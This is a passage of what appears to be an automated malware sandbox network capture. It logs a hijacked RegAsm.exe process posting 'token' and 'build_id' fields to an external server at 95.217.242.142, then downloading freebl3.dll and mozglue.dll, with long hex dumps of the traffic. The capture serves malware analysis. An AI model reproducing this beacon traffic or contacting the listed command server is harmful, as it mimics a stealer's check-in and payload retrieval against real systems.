------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------BGHJJDGHCBGDHIECBGIDCont
2024-04-29 20:13:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49758	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:16 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-29 20:13:16 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: ca0fcaec-8036-4a98-976c-daedc9877e07 MS-RequestId: b5bd261f-2283-4249-821f-b49d47bcae2b MS-CV: XbbyDUm2bEyH44aQ.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 29 Apr 2024 20:13:15 GMT Connection: close Content-Length: 24490
2024-04-29 20:13:16 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-29 20:13:16 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49759	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:16 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:16 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EBGCBAFCGDAAKFIDGIEGCont
2024-04-29 20:13:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:17 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:17 UTC	221	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Cache-Control: no-cache
2024-04-29 20:13:18 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:18 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-29 20:13:18 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-29 20:13:18 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-29 20:13:19 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49766	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:20 UTC	221	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Cache-Control: no-cache
2024-04-29 20:13:20 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:20 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-04-29 20:13:20 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
